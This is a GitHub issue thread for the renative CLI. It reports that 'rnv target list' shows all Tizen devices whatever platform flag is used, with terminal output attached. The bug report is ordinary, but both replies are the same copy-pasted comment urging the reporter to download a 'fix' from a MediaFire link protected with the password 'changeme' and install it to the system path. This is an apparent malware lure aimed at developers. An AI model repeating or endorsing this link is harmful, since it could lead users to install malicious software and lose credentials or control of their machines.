### ISSUE TITLE
[Tizen] Target list and target launch shows all devices on different tizen platforms

### ISSUE THREAD

**Issue by pauliusguzas** [flexn-io/renative#1666]
**Describe the bug**
target list and target launch shows all tizen devices no matter if you use -p tizen, -p tizenwatch, -p tizenmobile

**To Reproduce**
1. go to template-starter package
2. have tv device connected
3. do `npx rnv target list -p tizen` -> tv appears
4. do `npx rnv target list -p tizenwatch` -> tv also appears (expected tv doesn't appear)

**Screenshots or copy&paste**
```
pauliusguzas@MBP-de-Flexn template-starter % npx rnv target list -p tizenwatch

┌─────────────────────────────────────────────────────────────────┐
│ ██████╗ ███████╗███╗   ██╗ █████╗ ████████╗██╗██╗   ██╗███████╗ │
│ ██╔══██╗██╔════╝████╗  ██║██╔══██╗╚══██╔══╝██║██║   ██║██╔════╝ │
│ ██████╔╝█████╗  ██╔██╗ ██║███████║   ██║   ██║██║   ██║█████╗   │
│ ██╔══██╗██╔══╝  ██║╚██╗██║██╔══██║   ██║   ██║╚██╗ ██╔╝██╔══╝   │
│ ██║  ██║███████╗██║ ╚████║██║  ██║   ██║   ██║ ╚████╔╝ ███████╗ │
│ ╚═╝  ╚═╝╚══════╝╚═╝  ╚═══╝╚═╝  ╚═╝   ╚═╝   ╚═╝  ╚═══╝  ╚══════╝ │
│ 🚀 v:1.0.0 | renative.org | 8/27/2024, 11:47:51 AM              │
│ $ rnv target list -p tizenwatch                                 │
└─────────────────────────────────────────────────────────────────┘
info: Current platform: tizenwatch
info: Current engine: @rnv/engine-rn-web (../engine-rn-web)
task: ○ target list ↺1
task: ○ workspace configure ↺1
task: ✔ workspace configure
✔ Executing: "/Users/pauliusguzas/tizen-studio/tools/emulator/bin/em-cli" list-vm
✔ Executing: "/Users/pauliusguzas/tizen-studio/tools/sdb" devices
✔ Executing: "/Users/pauliusguzas/tizen-studio/tools/emulator/bin/em-cli" detail -n T-8.0-x86_64
✔ Executing: "/Users/pauliusguzas/tizen-studio/tools/emulator/bin/em-cli" detail -n T-samsung-7.0-x86
✔ Executing: "/Users/pauliusguzas/tizen-studio/tools/emulator/bin/em-cli" detail -n W-6.5-circle-x86
✔ Executing: "/Users/pauliusguzas/tizen-studio/tools/emulator/bin/em-cli" detail -n W-7.0-circle-x86
✔ Executing: "/Users/pauliusguzas/tizen-studio/tools/emulator/bin/em-cli" detail -n M-7.0-x86
✔ Executing: "/Users/pauliusguzas/tizen-studio/tools/emulator/bin/em-cli" detail -n M-6.5-x86
✔ Executing: "/Users/pauliusguzas/tizen-studio/tools/emulator/bin/em-cli" detail -n T-8.0-x86
✖ FAILED: "/Users/pauliusguzas/tizen-studio/tools/emulator/bin/em-cli" detail -n 192.168.1.204:26101 	device    	UE32M5522
COMMAND:

"/Users/pauliusguzas/tizen-studio/tools/emulator/bin/em-cli" detail -n 192.168.1.204:26101 	device    	UE32M5522

FAILED with ERROR:

Error: 'device' is not a valid option for 'detail'

Error: Command failed with exit code 2: "/Users/pauliusguzas/tizen-studio/tools/emulator/bin/em-cli" detail -n 192.168.1.204:26101 	device 	UE32M5522
Error: 'device' is not a valid option for 'detail'
    at makeError (/Users/pauliusguzas/Desktop/renative/renative/node_modules/execa/lib/error.js:60:11)
    at handlePromise (/Users/pauliusguzas/Desktop/renative/renative/node_modules/execa/index.js:118:26)
    at processTicksAndRejections (node:internal/process/task_queues:95:5)


task: ✔ target list
┌─────────────────────────────────────────────────────────────────┐
│ ✔ SUMMARY | 8/27/2024, 11:47:56 AM | rnv@1.0.0                  │
│ $ rnv target list -p tizenwatch                                 │
├─────────────────────────────────────────────────────────────────┤
│ Project: @rnv/template-starter@1.0.0                            │
│ Workspace: rnv                                                  │
│ Platform (-p): tizenwatch                                       │
│ Engine: @rnv/engine-rn-web                                      │
│ Build Scheme (-s): debug                                        │
│ Supported Platforms: ios, android, androidtv, firetv, androidwear, web, tizen, tvos, webos, macos, tizenwatch, kaios, chromecast, linux, windows
│ Env Info: darwin | x64 | node v18.18.0                          │
│ Executed Time: 0h:0m:4s:938ms                                   │
│
Tizen Targets:
[0]> W-6.5-circle-x86
[1]> W-7.0-circle-x86
[2]> 192.168.1.204:26101 	device    	UE32M5522

└─────────────────────────────────────────────────────────────────┘
pauliusguzas@MBP-de-Flexn template-starter %
```

**Desktop (please complete the following information):**

-   OS: Ventura 13.5.2
-   Node Version 18.18.0
-   RNV Version 1.0.0
-   rnv/template-starter Version 1.0.0

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
